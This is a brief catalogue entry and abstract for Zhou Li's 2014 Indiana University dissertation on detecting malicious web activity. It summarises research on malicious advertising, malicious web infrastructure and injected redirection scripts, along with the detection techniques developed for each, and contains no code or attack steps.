Zhou Li (Indiana University) "Understanding and detecting malicious web activities" (2014)

Zhou Li （Indiana University）”Understanding and detecting malicious web activities”, Advisor: Wang XiaoFeng, 2014

 The technological progress in today's Web not only fosters a booming Web industry, but also provides new opportunities to criminals who are industrializing their dark business. Capturing the malicious activities launched by attackers is not a trivial task as attackers' strategies are becoming increasingly sophisticated. In this dissertation research, the author performed a large-scale, systematically study on the behaviors and strategies of web attackers and developed three new techniques for detecting malicious activities in different scenarios. The author first studied an emerging threat that the attacker abuses the online advertising channel to deliver the malicious content to the web client. To mitigate the threat, the author leveraged the topological properties underlying the delivery of malicious Ads and built a detector that can automatically catch the malicious activities. The author further studied malicious Web infrastructure, which reveals the existence of dedicated malicious hosts that play orchestrating roles in malicious activities. In their research, the author identified their distinctive topological features and developed a detection technique to identify them in a large scale. Finally, the author examined an attack against vulnerable websites, in which the adversary compromises vulnerable sites and injects redirection scripts that bring visitors to malicious sites. The study shows that attackers blindly place their attack payloads on various web contents, including copies of popular open-source libraries. By comparing those libraries' original copies and compromised ones, the author built a new technique capable of extracting malicious content in a large scale.

For details, please contact the author or visit the thesis page.